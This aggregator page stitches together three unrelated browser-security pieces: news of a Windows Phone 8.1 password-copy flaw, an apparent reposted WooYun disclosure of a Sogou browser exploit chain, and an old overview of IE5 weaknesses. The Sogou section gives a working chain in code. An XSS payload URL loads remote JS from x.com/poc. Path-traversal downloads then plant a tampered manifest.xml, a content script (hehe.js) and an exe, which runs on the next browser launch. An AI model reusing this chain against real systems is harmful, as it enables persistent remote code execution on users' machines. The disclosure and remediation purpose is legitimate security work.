61阅读

搜狗浏览器漏洞-WP8.1浏览器重大漏洞:浏览器保存密码被泄露

发布时间:2018-05-07 所属栏目:ie漏洞

一 : WP8.1浏览器重大漏洞:浏览器保存密码被泄露

  国外媒体报道称,近日有用户发现了Windows Phone 8.1中IE浏览器所存在的一个重大漏洞,该漏洞将导致用户保存在浏览器中的密码被泄露。

  据用户反映,当在浏览器当中输入密码时系统的确是以“*”号代替字符来防止窥屏,但当用户将密码复制到其他地方的时候,却能够直接显示出所有字符,毫无保留。

  比如说,你在浏览器里输入密码“banter123”,那么系统会显示为“*********”。此时,如果你将“*********”复制到搜索框当中,那么系统就会启动Bing或者Cortana助手并在其中显示出完整的密码字符,即“banter123”。

  用户担心如此一来,如果有人想要窃取自己保存在浏览器中的密码,那么就只需简单的复制粘贴就行了,毫无安全性可言。

  目前,微软还尚未对此作出回应。但值得一提的是,Windows 10手机当中不存在这个问题。  

二 : 搜狗浏览器某漏洞一日中招后日日皆后门

听说搜狗输入法听歌挺不错。

1. 最新版本5.3.6.16631(上次漏洞版本为:5.2.5.15987),但上一个漏洞并未认真修复。



2. xss虽然修了,但是没修好,依然可以继续利用。比如用来加载一个外部JS:http://x.com/poc/sogou5.2.js



http://v.sogou.com/vc/play/redirect.jsp?url=http://live.wasu.cn/show/id/480').close();function open(){};if(!window._x){window._x=1;var s=document.createElement('script');s.src='//x.com/poc/sogou5.2.js?'%2bMath.random();document.body.appendChild(s);};a=open('a','&type=zhibo_vr&tvstation=%C7%E0%BA%A3%CE%C0%CA%D3



3. window.open("se://...").external 获得高权限external的问题依然没有解决,因此上一个漏洞里的方法依然有效( WooYun: 搜狗浏览器远程命令执行之五 )。



这意味着,依然可以执行到静默安装 com.sogou.cxj009.PicViewer这个扩展,并且该扩展的XSS漏洞并未修复,之前报过的下载任意文件到本地指定目录的缺陷也并未修补( WooYun: 搜狗浏览器远程命令执行之四 )。



4. com.sogou.feichuan默认安装下是1.0.0.23,这个版本下不存在上一个漏洞中所说的命令执行API,但是如果用户安装到1.0.0.26,上一个漏洞依然可以成功被利用。



5. 这里假定用户安装的就是 1.0.0.23 版本的 com.sogou.feichuan,我们不使用飞传这个扩展来进行利用,换一个方式。



6. 方式如下:



A. 利用com.sogou.cxj009.PicViewer的文件下载到任意目录的缺陷 ( WooYun: 搜狗浏览器远程命令执行之四 )。

B. 分别下载3个文件

http://x.com/poc/sogou.xml --> ../..\\Roaming\\SogouExplorer\\Extension\\com.sogou.gamecenter\\1.1.0\\manifest.xml

http://x.com/poc/hehe.js --> ../..\\Roaming\\SogouExplorer\\Extension\\com.sogou.gamecenter\\1.1.0\\hehe.js

http://x.com/poc/calcx.exe --> ../..\\Roaming\\SogouExplorer\\Extension\\com.sogou.gamecenter\\1.1.0\\sogouminigamepacker.exe



第一个文件,用来修改com.sogou.gamecenter这个扩展的 manifest.xml,主要修改2个点,



1是为plugin添加public="true",让该plugin可以暴露给任意页面







application/sogou-start-gamecenter-lite-plugin








2是添加一个content script,让每个网页都会加载hehe.js里的代码







hehe.js

*://*/*








第二个文件,就是被加载的hehe.js,代码如下:



//在页面内嵌入一个application/sogou-start-gamecenter-lite-plugin

var a=document.createElement("div");

a.innerHTML='';

document.body.appendChild(a);



//在页面内调用 application/sogou-start-gamecenter-lite-plugin 的 startExe 执行指定路径的exe

//现在版本的com.sogou.gamecenter的startExe函数的第一个参数已经改为了目录路径,会执行此目录下的sogouminigamepacker.exe

var b=document.createElement("script");

b.innerHTML='document.getElementById("embed1").startExe("../../Roaming/SogouExplorer/Extension/com.sogou.gamecenter/1.1.0/\\u0000","/popgame ",function(){})';

document.body.appendChild(b);



第三个文件,就是需要被hehe.js里的代码所执行的 sogouminigamepacker.exe



C. 当用户访问一次 攻击页面后, 攻击者会释放 以上3个文件,

当用户下次打开浏览器时,任意打开一个页面,就会调用 hehe.js 这个content script,然后利用被public的 application/sogou-start-gamecenter-lite-plugin 的startExe函数来执行所下载的sogouminigamepacker.exe。



过程如下图所示:

7. 具体利用流程:





|

http://v.sogou.com/vc/play/redirect.jsp(XSS漏洞)

|

http://x.com/poc/sogou5.2.js (调用)

|

window.open("se://sidebarextmanager/index.html").external.extension("installExtFromSidebarBox", "com.sogou.cxj009.PicViewer",...) (调用高权限external安装com.sogou.cxj009.PicViewer)

|

http://v.sogou.com/vc/play/redirect.jsp (再次利用这个XSS漏洞)

|

http://x.com/poc/sogou5.3.js (调用)

|

se-extension://ext-1588466412/v.html(利用com.sogou.cxj009.PicViewer的XSS漏洞及download API)

|

document.getElementById("picdownloader").download (步骤6中的三个下载过程)

|

用户下次使用搜狗浏览器时,执行上一次埋下的EXE。



7. 最终利用效果如下:

其中,测试代码中,com.sogou.gamecenter 是1.1.0版本,现在已经有新的1.2.0版本了,但是这并不影响文中的利用方式。只需要把sogou.xml里的版本号以及利用代码路径中的1.1.0 都改为1.2.0即可。

解决方案:(www.61k.com)

主要依然是对 window.open("se://...").external 的修复,另外防止这类恶意修改manifest.xml的行为,应该对 manifest.xml 做改动检查。

三 : IE浏览器漏洞

IE浏览器漏洞揭密
IE浏览器是每个上网的人都用过的,但同时它也是黑客们最常用来攻击别人的跳板和工具。了解一下这些IE浏览器中的漏洞和防治方法,以免各位被人黑了,还蒙在鼓里。

一、IE5.0在访问FTP站点时的漏洞(Windows NT系统)

上网时,许多朋友往往会去一些FTP站点上传一些自己的好东东。但就在你输入用户名和密码的同时,你也没有任何保留地告诉了别人。因为系统把你的用户名和密码都不加密且以文本的形式直接存储在历史纪录中。他们的具体位置如下:

英文版IE:

c:\winnt\profiles\[username]\history\history.IE5\index.dat和c:\winnt\profiles\[username]\history\history.IE5\mshist...\index.dat

中文版IE:

c:\winnt\profiles\[username]\cookies\index.dat

平时,上面所述的目录只有管理员和目录所属用户才有权限可以访问和修改。但是index.dat是任何人都可以访问的,是everyone full control permission级的。在“Brpass traverse checking”下的默认权限是分给每一个组的,就是说每个用户都可以访问别的用户的index.dat文件。

补救措施:

1.除administrator之外,将别的用户的Brpass traverse checking权限去掉。

2.将历史纪录中的和密码有关的信息删除。

3.给每位用户的profile的目录和文件进行访问控制设置!只有管理员和所有者才能访问。

4.上传的时候,用CuteFTP等软件完成,不要直接使用IE。

二、IE5.0 ActiveX漏洞

IE5.0中为了增强其自身功能加入了对ActiveX控件的支持,可以创建和复制客户端文件。要是对方不怀好意,存心要黑你,这是一个极其方便的捷径!黑客可以在IE用户点击网页上的超级链接时,将html应用文件中的可执行程序放在你的硬盘里,并将你的注册表修改掉,使程序在下次重起时自动运行……

补救措施:

1.将IE的安全级别设置为高。

2.把ActiveX controls和plug-in关闭。

3.将Active scripting屏蔽掉。

三、利用IE5.0攻击系统漏洞:

以下有一段针对Windows 98系统HTML代码,虽然它只不过五行而已,但是如果你浏览一下用下面代码写成的网页,那足以让你的机器死翘翘,如果你正在上网,它将使你跌下网。




</body>
</html>

四、利用IE5.0格式化硬盘

如果你认为上面的代码只能让你死机罢了,没什么了不起的!!那么有的代码将使你的硬盘资料如大江之水,滔滔东去不复返……(出于安全,代码略去)

以上是本人知道的一些IE浏览器漏洞,希望各位朋友能引起重视,千万不要被黑客利用,否则损失就大了。



我要[dfcg]

本文标题:搜狗浏览器漏洞-WP8.1浏览器重大漏洞:浏览器保存密码被泄露
本文地址: http://www.61k.com/1218675.html

61阅读| 精彩专题| 最新文章| 热门文章| 苏ICP备13036349号-1